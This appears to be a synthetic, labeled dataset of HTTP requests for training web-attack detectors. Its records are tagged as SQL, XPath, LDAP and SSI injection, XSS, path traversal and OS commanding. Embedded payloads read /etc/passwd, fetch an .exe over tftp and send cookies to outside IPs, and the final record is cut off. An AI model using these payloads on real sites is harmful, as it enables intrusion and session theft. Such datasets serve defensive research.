Date: Sat, 02 Aug 08 22:04:51 GMT
ETag: "qY1F1gA6Xdx_fn-fmH4"
Expect: ois81Er
From: nptt@ai166.st
If-Modified-Since: Wed, 08 Apr 09 03:58:16 UTC
If-Unmodified-Since: Fri, 07 Sep 07 23:03:54 GMT
If-Match: *
If-None-Match: *
If-Range: Fri, 18 Sep 09 01:06:22 CET
Max-Forwards: 89
MIME-Version: 6.7
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: NTLM M2VhcnhuSGFsNG83MHNvY2lpYXdhemxwT2VzcnJkbGNuc2dhaWxzbmU=
Range: -0128,0-7163
Referer: /Yiw6/oQ0tCEdD/eroth/ahstnooe/nirtroa.png
TE: gzip,gzip
Trailer: TE
User-Agent: Mozilla/3.4 (X11; U; Linux i386 1.1; nf-tL; rv:6.8.9) Gecko/56168484
UA-CPU: Sparc
UA-Disp: 453,3007,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 161x6887
Via: 9.1 www.oiso8v.shtml, 9.8 192.100.75.153
Transfer-Encoding: deflate
Upgrade: d3ec/2.6, tifat/9.6
Warning: 550 www.hfiueaes.shtml "mhtjtnssennQ8" "Fri, 14 Nov 08 07:02:27 UTC"
X-Forwarded-For: 171.203.103.227
X-Serial-Number: 727389738621693748
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 35723
Start - Id: 39694
class: SSI
GET /nL/nJQ@H6/ige6nn/ttneF3PW1f-8_6hDVP/inwc4OVs--jS/oqRZ0S/9processing-instructionSostdinWxCkfE/4mA/mekhAbh45i9npih6dPoc/iHNDuIF/BU.css?vbscript7qnusrS=n4e%3AorTo&houefgN8nlmabz=%3C%21--+%23include+virtual%3D%22%2Fetc%2Fpasswd%22+++++--%3E&Gupdate_tY=42847763&y1ojycae3abNdst=elGQ_F7Ck9C&7Ief=5&qJGF.MKfse1=67063992&Ow6o=tpwor&eQoA=eta+zltcx+uw%5B+8i+ka-&h9TQA0bPQPnD=p7IwHJ&3otecshgnonauj=6429&aatbor9rihrlxb=tcc+includegas%25tarheacmkN&eahilrntoaoaAyE=Eirclde&tisVhs=sfsE-zM&cdoow86geet8=8&yuHYUTJmSK=ii+lu%28%5Da%3CSapanh%2F6 HTTP/1.0
Host: www.t4thb.net
Connection: keep-alive
Accept: image/*;q=0.1, audio/*, audio/x-wav;q=0.6
Accept-Charset: *
Accept-Encoding: deflate;q=0.6, deflate;q=0.4, identity;q=0.7, compress;q=0.8, gzip;q=0.8
Accept-Language: fjhrts-sp2aaP, horta-Atn;q=0.3
Cache-Control: an5j=nn
Client-ip: 170.88.156.59
Cookie: d2eqar1=oidernc;agTnuOe=psh9i;sra9ke5=bK7ZIo;edaort=nLahZMcYNYd7;ieegRrlD1dasMau=tY-.METMCSl;reedyr7oeoibo5=I/ehm
Cookie2: $Version="38"
Date: Sat, 27 Jun 09 03:58:05 GMT
ETag: W/"xkPYfz.4VPY.xSX"
Expect: 100-continue
From: ekb7rls@onnByehnb.gov
If-Modified-Since: Wed, 11 Feb 09 18:30:43 UTC
If-Unmodified-Since: Fri, 30 Nov 07 02:59:55 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 04
MIME-Version: 9.9
Pragma: no-cache
Proxy-Authorization: Digest nc=ddEF82d6
Authorization: Digest algorithm=MD5
Range: 11490-87515,-392,063833-721563
Referer: /nNnxo/OdtGrI/3nxhdt/otsn/Outr0.css
TE: gzip;q=0.7,deflate;q=0.3
Trailer: User-Agent
User-Agent: Mozilla/3.7 (Windows; U; Windows NT 0.5; aI-ty; rv:2.6.3) Gecko/53684174
UA-CPU: Sparc
UA-Disp: 0266,938,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 726x074
Via: FTP/8.3 108.142.84.77, HTTP/2.6 www.snyJdio.js
Transfer-Encoding: gzip
Upgrade: im0/0.0, gln/3.7
Warning: 245 www.etcYe.gif "ra5teOtlcka8shsedl7" 
X-Forwarded-For: 166.133.168.205
X-Serial-Number: 9911764547155
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39694
Start - Id: 49025
class: XPathInjection
GET /qqSaccess_logQL6Ime/e_BMo4@k3b00H8cDy2@H/hb97/tqN57KtnYvmCq5tA4Pxy/t4nPS./aTrFnaesoceleilrae3.js?looozo5e=21&pIyrkn9npe4rlF=235454&oz91=ds-TkM&roa4rqE=car%40d%28a+jr2sock_stream&hu=6806794100&9e4A6a=%28i+++++%3C++count%28nTse6%2Fchild%3A%3Atext%28%29%29+and+++++j++++%3C++count%28Trot%2Fchild%3A%3Acomment%28%29%29+and+k++++%3C+count%28c139%2Fchild%3A%3A*%29++++%29&ioi=dM5Q_bL6hC HTTP/1.1
Host: www.hath.de
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: 
Accept-Language: cbnUi-ussfsdi;q=0.3, mKbroj-hrabtr;q=0.3, nroi7u-lnouoiro, NimAwuj-iivii
Cache-Control: min-fresh=3707
Client-ip: 218.235.95.33
Cookie: YlAe=e1aernratohami;hiic=hW.0d@gw;ar=52371;O9abpidxEaRApAz=8witrso;5gVwPxMX4=43503
Cookie2: $Version="4"
Date: Tue, 15 Sep 09 12:43:05 CET
ETag: "hqas.qShK2Qyew_tqh"
Expect: asneEri=oe6du;Oioao=uoxeyx
From: oc6etY@0uezaiml.cz
If-Modified-Since: Sun, 10 Feb 08 18:26:22 UTC
If-Unmodified-Since: Thu, 04 Feb 10 07:50:36 UTC
If-Match: "Ed3i-XvroSmJ0AiKxP"
If-None-Match: "ty_Ki87YMOpe8dpkshkX"
If-Range: *
Max-Forwards: 4555
MIME-Version: 9.3
Pragma: no-cache
Proxy-Authorization: t597i7 s1mtW=e9ixee
Authorization: Digest algorithm=MD5-sess
Range: -31
Referer: /eiac/bn5v/naoUf/ehmtasmu.nsf
TE: trailers,trailers
Trailer: Pragma
User-Agent: Mozilla/5.7 (compatible; OerhSeue; Mac OS X; twps7ewrch; htli5)
UA-CPU: 68000
UA-Disp: 167,2899,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 1840x9062
Via: HTTP/2.4 159.197.112.36
Transfer-Encoding: compress
Upgrade: l7T/6.8, egesr/9.6, aotEhh/5.3, leolo/7.4
Warning: 832 www.aeh0a9i.js:7 "omte8QStoehr7LPtw" 
X-Forwarded-For: 216.15.10.143
X-Serial-Number: 00627692594
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49025
Start - Id: 41938
class: SqlInjection
GET /objectK7XXM/oE6ohAepnwssnNEaSr/p0@HtlI5Lnfhaving/FXB0d1meta7ZbvDzZ.jpg?sUavUI=d%24usrEne%3Cqttj5oede&ehn=ngroup+byofsolifldgsrh&rn5sueoorlN=nnl2a&jFstdinufrom@6B8Xg=4dvodocument&nti=+%3C+6s&nci=%27+%29++++UNION+++++ALL+SELECT++++728%2C70%2C48%2C037%2C5+FROM+wec2+++WHERE+++%28++%27%27++++%3D%27&npAe=sNO&bygdkecldhond=eTX&tHbhnpisdaaeD4t=9020 HTTP/1.0
Host: 89.239.249.12
Connection: close
Accept: */*
Accept-Charset: iso-8859-15;q=0.5, x-mac-korean
Accept-Encoding: deflate
Accept-Language: *;q=0.1
Cache-Control: no-transform
Client-ip: 148.203.206.38
Cookie: biar3=190503;xte5vtlsgSrsne=8
Cookie2: $Version="9"
Date: Fri, 20 Jan 06 02:28:46 GMT
ETag: "yqI8BVet6kNEav5Q"
Expect: yrnr=0aorOe
From: m9He0on@mdltezsc.org
If-Modified-Since: Mon, 20 Jul 09 16:42:05 GMT
If-Unmodified-Since: Thu, 29 Apr 10 13:26:41 UTC
If-Match: "h1xAaJiYOZdWVdq"
If-None-Match: *
If-Range: Wed, 23 May 07 04:01:46 CET
Max-Forwards: 71
MIME-Version: 0.8
Pragma: no-cache
Proxy-Authorization: aies sesl=fkaciu
Authorization: Digest uri=/7et8dNa.jsp
Range: 230210-,74601-,-666
Referer: /ee6jaene/gtBo1/ymIlm.swf
TE: trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/3.0 (compatible; MSIE 7.4; Unix; rxwqun3)
UA-CPU: 68000
UA-Disp: 4298,556,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 724x022
Via: HTTP/0.0 www.5sox.gif, 2.4 www.Caatteoe.css, a3TzXn/1.1 www.ircr.jpg:7
Transfer-Encoding: deflate
Upgrade: sot/9.3, iin/4.4, eTa0/6.2
Warning: 985 75.9.47.68 "9pnu" "Mon, 31 May 04 18:02:50 CET"
X-Forwarded-For: 79.193.225.128
X-Serial-Number: 79709150
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41938
Start - Id: 47371
class: XSS
GET /fromNnodenVlXGwwLC/mdi/2afw/tasei/aluNzdonunEt9/i0Cf/nthoFyno/aceMMIE5i/vsrvgl3eesaDee3a/ho2au.js?y1atXd=%3Ciframe++++src++++%3D++%22++vbscript%3A%5Balert++++%28%27oasarcil%27%29%3B%5D+++%22++++%3E HTTP/1.0
Host: 45.140.100.21
Connection: eupxarht
Accept: */*;q=0.8
Accept-Charset: cp-950;q=0.7, cp-932;q=0.5, koi8;q=0.9, x-mac-hebrew, x-mac-hebrew
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-stale
Client-ip: 61.200.67.223
Cookie: dLDa=ussntmstyleo;33gg@-aOcwYexec=erxgM.xnN;e4irioaAi=012643;rei4=og0eHmieieswp-G;0yeta=S7foNgcie9qyaqmHe
Cookie2: $Version="004"
Date: Mon, 13 Jul 09 01:24:24 UTC
ETag: W/"PjYKmUAHLLYd8gcE5"
Expect: 100-continue
From: iArw@m7oEd0Y8.fr
If-Modified-Since: Sun, 23 Aug 09 23:19:47 GMT
If-Unmodified-Since: Sat, 06 Mar 10 12:31:08 CET
If-Match: *
If-None-Match: "mwW8--AxXoKsq6P"
If-Range: *
Max-Forwards: 7378
MIME-Version: 3.7
Pragma: no-cache
Proxy-Authorization: NTLM M3NhVDJodHVuaWRyajZpZTBpZGlPbnRPcnB0ZWlyOXN5Y3Jsb2VpbWNlY2Y1b2c=
Authorization: Digest qop=auth-int
Range: 35419-,75138-2674,165640-
Referer: /mkboo/onaajsaP/e5tIaOs/riye.swf
TE: deflate,trailers
Trailer: Trailer
User-Agent: Mozilla/5.5 (compatible; aanha; Solaris; craQ2; aov0cof; enhtilib)
UA-CPU: MIPS
UA-Disp: 0297,0237,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 605x5902
Via: 5.1 www.afOraAo.tiff, FTP/6.7 www.sRswaoe.png
Transfer-Encoding: deflate
Upgrade: ek7/9.9, ih4i/2.6, tncaf/1.8, fikd/2.8, enm/1.6
Warning: 045 www.7ot6v.tiff:40 "9ew6nQffbtqNaolon" 
X-Forwarded-For: 131.225.250.219
X-Serial-Number: 0450626600564347
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47371
Start - Id: 36300
class: PathTransversal
GET /at/o13AYE8OC_LuOyf/rsatsZah.dll?ro0eaeef=7212263&0IinFrX8@1tmpwE=lnU&ershCadet8a0Id=teNte2e&lhoojm=8&0ehqsl5ogt=033&anwsLrhce7drsue=50470&NeeIcseuesw65n=eWN2&Yv8g=%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2Fapoenu.conf HTTP/1.0
Host: www.rtkrOca.ch
Connection: close
Accept: */*
Accept-Charset: *;q=0.2
Accept-Encoding: gzip, compress, gzip
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 173.42.72.46
Cookie: etrrxeS=sheuHtiw5aiokldnor
Cookie2: $Version="878"
Date: Thu, 20 Nov 08 04:29:26 UTC
ETag: W/"_CMpMj-5Yq9_H_Af87"
Expect: 100-continue
From: Ai3uSa@urpega.be
If-Modified-Since: Fri, 30 Oct 09 11:07:23 GMT
If-Unmodified-Since: Tue, 15 Apr 08 01:22:10 UTC
If-Match: "pV61aumhgieINFT"
If-None-Match: "JXAedA1i-p0PTnP"
If-Range: Tue, 15 Dec 09 10:21:51 UTC
Max-Forwards: 9318
MIME-Version: 7.2
Pragma: no-cache
Proxy-Authorization: Basic dWRVMWF0QWg6bnlwc3Q0ag==
Authorization: Digest realm
Range: 9-463
Referer: http://07neheo.org/nrlryUs/wf7kr/mtehUn/zetagect.php
TE: deflate;q=0.8,deflate,gzip
Trailer: Accept-Encoding
User-Agent: rpl6emgedtNopNa
UA-CPU: MIPS
UA-Disp: 505,9391,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 645x5981
Via: 7.8 140.247.82.156:56420
Transfer-Encoding: gzip
Upgrade: oafi/4.5
Warning: 777 www.eraf47ht.html "lzrhseSsp9edvonjaeyx" "Fri, 05 Jun 09 03:03:54 UTC"
X-Forwarded-For: 142.213.134.120
X-Serial-Number: 50534394193049437616
----: -----------
~~~~~: ~~~~~~~~~~~

null

End - Id: 36300
Start - Id: 43528
class: OsCommanding
GET /eeotAeeih8lr1eeoat/sG_ZH-/lMOwz/o7CUC/4v5eW/3S.html?y2bo7ei=+&io=tftp+++-c++get+++++219.148.177.152%3A%2Fgenire%2Fmarear.exe+%7C&s8wSni=903&bDeo1do=7666815&eoe=aded3uent0aopdprtb&oifa=opAt4ttor&gemUiuSadhn=4560&ctovaecoj=yaafscdpntiPr&etp=cf9esiaMt%25IUnsmogroup+by85e&4PusroPR=r27nn+bnnexecc7zXan&awciiSirsIiseat=wtp7vlksasRm&UyGHE0mJ=srm%5C%5Bbsah%3F&aersletst1oeTme=sock_streamaIw%3Cwinntde&eue=h&pU9kzF6L=nh4 HTTP/1.1
Host: www.tC1R.fr:80
Connection: keep-alive
Accept: image/png, application/*;q=0.8, application/*
Accept-Charset: x-mac-chinesesimp, x-mac-arabic
Accept-Encoding: *
Accept-Language: *;q=0.6
Cache-Control: Lfatm='e'
Client-ip: 175.223.148.237
Cookie: inihfibteneoc=mSKkjJU
Cookie2: $Version="7"
Date: Tue, 14 Nov 06 14:58:05 UTC
ETag: W/"3MhJB@hH6iEmRFtgb"
Expect: 100-continue
From: ioojil@heyq.net
If-Modified-Since: Sun, 01 Apr 07 17:42:52 UTC
If-Unmodified-Since: Sun, 25 Dec 05 17:46:23 CET
If-Match: *
If-None-Match: "LdYhY87Xo.3wzaxnFD"
If-Range: *
Max-Forwards: 4460
MIME-Version: 3.5
Pragma: no-cache
Proxy-Authorization: Basic QWFhaWM6cm5pb0Ez
Authorization: Digest realm
Range: -983461,45-31195
Referer: http://www.6eOM.biz/siits/onchfoL/dh1mtoo/neellrm/ibdjwe.dll
TE: trailers
Trailer: Expect
User-Agent: Mozilla/4.2 (X11; U; Linux i386 0.0; em-ks; rv:2.3.2) Gecko/35928044
UA-CPU: PowerPC
UA-Disp: 230,276,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 612x3131
Via: 6.0 35.153.147.124, HTTP/4.3 www.eksfXe.tiff
Transfer-Encoding: deaMh
Upgrade: icjo/5.5
Warning: 156 193.81.211.74 "9aeu3wesnnaer" 
X-Forwarded-For: 118.79.162.108
X-Serial-Number: 61216613
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43528
Start - Id: 46591
class: XSS
GET /h7gWqYgc333mlBVQzX/ooalkert5ss/a9A0Y/iadkdabfnmsdn/eslewOnstxqtetasulin/aReiwttzGi60qrrmi/eEoh62saws2/0ExOQ/9gWmHE2A/TcOspg6na8ROons5/fJXoqnNJcBN2_m.Ux/meu2.css?kadeffk=eaginjI7rdcdN&wrsouefraoNb=-ne%26OS&R4adk=ece3o1i&pckiaxstcari=224636&dsw79ynehRh=t%5Dposition&2in=vo&8aqp07SSRe=t%2F&laeQt1u3oaeehm=processing-instruction%3Cpe&V83rzhCHv.F7=tr3gse%26l1%3Asock_streamdesmOdtrn&41ni4amd=4336443&7isAa1ezlcstlo=kns0hadminfi&dUWJQcTTP@H=oce60n6t%3EEr&moe=uhvj5c- HTTP/1.0
Host: 234.21.133.155
Connection: close
Accept: */*;q=0.8
Accept-Charset: *;q=0.5
Accept-Encoding: identity;q=0.8, deflate, deflate;q=0.0
Accept-Language: *
Cache-Control: no-transform
Client-ip: 242.106.13.229
Cookie: e5mmoisuo=83
Cookie2: $Version="447"
Date: Wed, 27 Jan 10 13:58:22 UTC
ETag: "XFff9F2kkW70dfSTqAV"
Expect: 100-continue
From: i1lrmrmC@lnNy.biz
If-Modified-Since: Sun, 16 Apr 06 21:07:55 UTC
If-Unmodified-Since: Thu, 22 May 08 13:38:56 GMT
If-Match: "Rsx0uDBbGRsxCdELJF"
If-None-Match: *
If-Range: Tue, 23 Sep 08 18:10:38 UTC
Max-Forwards: 64
MIME-Version: 8.5
Pragma: no-cache
Proxy-Authorization: so7n seEgteed=c5edme
Authorization: Basic Z3RLdGJkOnN1cGFl
Range: -65951,35-456894
Referer: http://Hgoiidkf.cz/taap7atE/nHlo9hu/owtnh.png
TE: chunked;q=0.2,trailers,trailers
Trailer: Max-Forwards
User-Agent: <object classid  ="   clsid:...    "   codebase  =    "javascript:[window.open('http://217.81.87.85/lindse.bin'+document.cookie);]">
UA-CPU: Sparc
UA-Disp: 1938,517,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 991x9240
Via: HTTP/5.4 216.225.124.70, 7.8 9.34.17.186, 7.9 108.52.20.221
Transfer-Encoding: identity
Upgrade: Sclxk9/4.9, M9s8r/4.0, 1pr/8.7, eh6/3.6, stmem/0.6
Warning: 051 74.151.102.193 "tps9iyOEh" 
X-Forwarded-For: 219.165.16.16
X-Serial-Number: 015353495234
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46591
Start - Id: 39051
class: LdapInjection
POST /oilfdrV8esic/1wirs0sdrt.shtml? HTTP/1.1
Content-Length: 33
Content-Language: 8tlt,e
Content-Encoding: compress
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 05 May 04 04:31:41 GMT
Host: www.aO6etra.be
Connection: close
Accept: audio/x-wav;q=0.0, application/zip;q=0.9
Accept-Charset: *
Accept-Encoding: ")(targetfilter=(o=NetscapeRoot))
Accept-Language: eeGe-82akdry, ooS5o2er-wqt, btgnut-rgjtmebw;q=0.0, SeoGy0eJ-lroat;q=0.5, eSon-k8eealo;q=0.4
Cache-Control: no-cache
Client-ip: 95.187.156.44
Expect: shirae=nate2s;tbaele=antSutH
If-Unmodified-Since: Tue, 28 Dec 04 18:33:26 UTC
If-Match: *
If-None-Match: *
Max-Forwards: 6621
Referer: http://www.Lmnm8rIe.net/mtgtePc/wg8lws/woitai.wmn
TE: chunked;q=0.9
Trailer: Transfer-Encoding
User-Agent: Mozilla/9.0 (compatible; 3HltovmSi; Unix; Rlhahd; otemwsu; tvmhrrleh)

ntegi9dS=8243387374&rslpiA=101235

End - Id: 39051
Start - Id: 46811
class: XSS
POST /5IaIduhleuvns/iCipY0LbE7f23M/tnuzeqT1u/6e0j/aBpbJu6QBwjVtb/hO-LyV/VmkrDopt/490Twecf/rRVMRXjs8Se/oH/l91arrhtWgE/tydpAb81fPWFbeFm.tiff? HTTP/1.0
Content-Length: 458
Content-Language: u6an,tfnz
Content-Encoding: identity
Content-Location: /pRtscea/oz8iesze.gz
Content-MD5: Y3Q4c201cFJlemQ4bGMwdQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 30 Mar 06 19:14:33 CET
Last-Modified: Sun, 27 Sep 09 09:28:49 CET
Host: www.rtr1oe.net
Connection: apaoTuWE
Accept: */*;q=0.2
Accept-Charset: ks_c_5601-1987;q=0.3, cp-950, cp-932;q=0.5
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 180.151.251.196
Cookie: AEXw4s=8164402844;hnuihYsuelt=ytcownab;HzNethleal=s?iasEoewinntSmperlf ;agr7=ou5a
Cookie2: $Version="66"
Date: Sun, 17 May 09 06:43:12 UTC
ETag: "y@tKjzaOGXeONi4MFD"
Expect: crttsci=ei2cr
From: wdvoio@iotd9eelwd.de
If-Modified-Since: Fri, 09 Jul 04 04:49:07 CET
If-Unmodified-Since: Wed, 08 Jul 09 08:58:31 GMT
If-Match: "IivuB7J5hPJGPwFpQvxu"
If-None-Match: "G45FC028of2eqx3ST.I"
If-Range: Thu, 09 Nov 06 12:57:01 UTC
Max-Forwards: 1871
MIME-Version: 8.3
Pragma: no-cache
Proxy-Authorization: oand kioW=rs9ay
Authorization: NTLM ZXJkRWV0MmJod0Jmcm9pc3JzMUZuMWg1c2VsMm5mZWh4ZWFvdnU=
Range: 175390-78,55-,908690-
Referer: http://elsif.com/sey48Y/ocyfyEl/o9Ziue.mpg
TE: trailers,trailers,trailers
Trailer: Host
User-Agent: UVul/9.8.1.8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 818x5674
Via: 7.3 www.r7eFut.css:6
Transfer-Encoding: identity
Upgrade: 5dpmt/2.8, kAt/9.2, PrmjAp/1.4, moi/3.4
Warning: 793 241.179.195.131 "halAIevnm" "Wed, 27 Apr 05 17:07:05 CET"
X-Forwarded-For: 254.13.104.181
X-Serial-Number: 80684101
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Rob5nlss6ae6=enhatoMeRi&ee6berthhrnooo=399&3tREvg=o&TB_y@r=<img src ="nt >  "   onmouseover  =    "   [window.open('http://45.245.73.113/leet.swf'+document.cookie);]" >&aWshtaic7mot5F=2&iYaEwni=T4eu&ddte6=2hrE8&Sstmrtz=nhnt3 amit3ubbetweenna72&aydtdttiael=dDkpiv5O_iz&XXq3vGYqq=eritiz%uHtsoe9r9replaceh5su&e3rBeitlw=bXfEd&0kvapJ9B3SH=ttetvhrGaierUlibld&taiioNino=5&aeehn9ettash=ssimgayj%et?ofeOiosock_stream&

End - Id: 46811
Start - Id: 42226
class: SqlInjection
GET /aE2e.lR3@T@8oMz9/Eitrlia8rept3dse/sVnaJRRtHZJGQ/LlIwi5utnttAe/nk-rv9z6T4p/rJqLyu5@tM/wadx9oX./eBAe0wSfD/hcu/vnbrj8erhd7aorthm6m/eoiEix5centaogmee/aqdABmf.NtY@SbH.gif?jv=zh%2Fhi%24ode4d&J3wEuhV=+c%295+ft&bt5eunaiyh5=372172&tdzp=rdi&M_FOPb-n=28&osais=9523&gaeoCaansg8ee=ee&xodcg3hgv=nesn&iJ62=le1rnbven%3D&vceltiM5eewon=+ras++&a5lUso=%27++++OR++++%275Ttem6hrriZn%27++%3E+%27S&6eheiHeutye=cemnDhHeghlSeDe1E&aeghasaw=4801413389&KinputinQ=59 HTTP/1.1
Host: www.a7esNs.it:883
Connection: close
Accept: */*
Accept-Charset: iso-8859-4;q=0.1
Accept-Encoding: *
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 113.18.47.101
Cookie: nwxthhped32=918412034;wa41.Zzy5_K=992411;XE0b=86884;ruee=E'eCe
Cookie2: $Version="303"
Date: Tue, 12 Jun 07 08:57:58 CET
ETag: W/"sIriMAl4WPniCIC"
Expect: 100-continue
From: 6bttom@2kOpyg.org
If-Modified-Since: Fri, 25 Mar 05 09:17:41 GMT
If-Unmodified-Since: Mon, 13 Sep 04 12:10:42 UTC
If-Match: *
If-None-Match: "UlE8z_q4FyB7iV_Zfc"
If-Range: "nQD8RjO5nsCm4fa88OPP"
Max-Forwards: 011
MIME-Version: 0.3
Pragma: no-cache
Proxy-Authorization: Basic eXJoZTc6dEVpZXQ=
Authorization: Basic UnRvZG9ubzplbGVvMTV4
Range: 498-82346
Referer: /Lr4lnd.nsf
TE: gzip
Trailer: If-Range
User-Agent: p4enr@ http://www.eEcul8ra.fr
UA-CPU: x86
UA-Disp: 4436,548,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 451x3766
Via: 5.9 www.EorOa7.css
Transfer-Encoding: eiqbe; sAwm=flea0w9
Upgrade: s1sE/7.8, ytaat/3.7, hNej/0.0
Warning: 805 www.oCYoru.jpg "crToo" "Wed, 13 Feb 08 17:50:20 GMT"
X-Forwarded-For: 3.212.183.96
X-Serial-Number: 8756384538065662
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42226
Start - Id: 47079
class: XSS
GET /oAdsFJjrN1dk/rZXJNnvQl.eVYEo/rQIol/Ytqz1N2EEgexecf/lo8utitleireN8ta/tSZxGxejjNSHNi_/aN147AjMX7NCX.php3?0aotn=%3Cbgsound++src+%3D+%22javascript%3A%5Bdocument.location.replace+%28%27http%3A%2F%2Fwww.arortrne.com%2Fcgi-bin%2Flisintor.cgi%27%2Bdocument.cookie%29%3B%5D+++%22%3E&fNdoag=9ilink&trdcanim=elr&rthA=thtN&thNbieEMkmepTtg=positionoYhee3crmrher&uttlvecelllcta7=ebe&wrsli=tloatd&siaMe0h=dzWfMU&bidTcnCasmiV=2374&YOYdlp4andFE=d46uCpz&t4=nW87.Pacra5&nby72usneO=z+2%28&2cdyt=819268 HTTP/1.0
Host: www.vrfdrz.gov
Connection: close
Accept: audio/*, application/*;q=0.0, image/jpeg;q=0.1
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: max-age=8931
Client-ip: 25.88.59.6
Cookie: ec=62009654;Fs_96u5_6p=08connectqtt: servicesncHeeisoiformt;ahsed1cnnts=vgn0ezteeeahgois/betweenh;DLd2HK=ncneba;ivEmznJmi=629886
Cookie2: $Version="70"
Date: Fri, 11 Mar 05 16:17:28 CET
ETag: W/"_GoF4kFerEKe6x3Rh2-J"
Expect: 100-continue
From: danndie@tun81utu.cz
If-Modified-Since: Mon, 20 Jun 05 03:23:00 UTC
If-Unmodified-Since: Sat, 30 Oct 04 02:04:04 GMT
If-Match: *
If-None-Match: "FQXy7R5Hsbye14.en0Ym"
If-Range: Tue, 28 Jun 05 06:51:45 CET
Max-Forwards: 7
MIME-Version: 6.8
Pragma: esannB=eoOt9ke
Proxy-Authorization: sevi uteRs=ionsesm
Authorization: NTLM amljdEV1aTVpZHJ5YWV6b3JuRGFlYXNvaWFzaGhjRW1uZTMzZ2g=
Range: 44535-
Referer: /uyn7neYC/eDoot3ie.swf
TE: trailers
Trailer: Warning
User-Agent: oermm74 (gOfiE7; 5NyBjk82YY; 47vHmM; eqOa2N; nOO3Zn6@X)
UA-CPU: MIPS
UA-Disp: 016,6175,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 071x3560
Via: ee3jn/1.2 13.19.213.79:8110
Transfer-Encoding: identity
Upgrade: keTun/5.2, keYr/6.3, ierin/2.2, rla/1.3
Warning: 699 www.gnimlw.jpeg "bgtHtysIo0h" "Wed, 01 Aug 07 11:24:11 UTC"
X-Forwarded-For: 69.181.229.169
X-Serial-Number: 60697232
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 47079
Start - Id: 40337
class: SSI
GET /aay/Pjc@Xg0K.css?N-passwdWJ2t8_AXR=ai0fontsau&Hwwp-uA1HqG=35382&nhemifeqoae=8573514340&nuajIiMemhern=1104&.5RV_NU5=%3C%21--++++%23exec++++cmd%3D%22c%3A%5Cprogra%7E1%5Cpnoo%5Ch0heelio8%5C2tZl.exe+++d%3A%5Coab6nns%5Cwww.stngil.org%5Cafettu%5Cdatabase.mdb+%2Fx+++exporttofoxpro%22--%3E&ttpo=54&ytoaUlacknc=atuoR+6re2Farriy%3E&ecnEh=t9lr%5C%3Aeeplb&naeIif=ect%26Ebfus HTTP/1.0
Host: www.nlHn0ir.gov
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-greek;q=0.7, euc-cn, x-mac-cyrillic;q=0.8
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=6521
Client-ip: 21.250.170.182
Cookie: tmpdpu8-Ch=7ae
Date: Sat, 25 Aug 07 04:17:13 UTC
ETag: "-2SnMmPGNUPDo6afli"
Expect: 100-continue
If-Modified-Since: Wed, 13 Sep 06 04:53:14 UTC
If-Unmodified-Since: Sat, 22 Aug 09 09:37:43 GMT
If-Match: "958Yxp8OHNYMUwIy8e"
If-None-Match: *
If-Range: Sun, 18 May 08 24:34:33 CET
Max-Forwards: 99
MIME-Version: 3.8
Pragma: ooiz1cte=oirtuz
Proxy-Authorization: Digest response="294CCE866907f6d2817d414d28f0AeF8"
Authorization: Digest realm
Range: -681198,453389-53032,-61223
Referer: /5edfitly/NliafeaH.css
TE: deflate
User-Agent: Mozilla/6.4 (Machintosh; U; PPC 4.9; 4O-lg; rv:5.2.3) Gecko/41494501
UA-CPU: StrongARM
UA-Disp: 041,313,32
UA-Color: color8
UA-Pixels: 384x228
Via: HTTP/2.0 221.89.128.117
Transfer-Encoding: deflate
Upgrade: ogu/6.9, nh0i/0.5, njHtk/8.8, I6inrl/2.9, Eflir/9.1
Warning: 563 www.ptln.png:756 "oeoaCord" "Sat, 26 Mar 05 04:53:57 GMT"
X-Forwarded-For: 42.162.17.85
X-Serial-Number: 22985

null

End - Id: 40337
Start - Id: 37304
class: LdapInjection
POST /7FeDfIMw/iEnutnsGoog/wWHvQhgN/edseefmt/1R8CkdeleteadminE/et-S.yhOFo.a.e5Ev@Bi/n6uIgd/aanuhy1rgtdiowgn/tr3D/iG5c6FC5QTaeT_Ybn.pl? HTTP/1.0
Content-Length: 150
Content-Language: n9te,np,rifl
Content-Encoding: gzip
Content-Location: http://www.7Pono.fr/abw5h.gif
Content-MD5: ckFkVDJBdGllZHo0bWtzaQ==
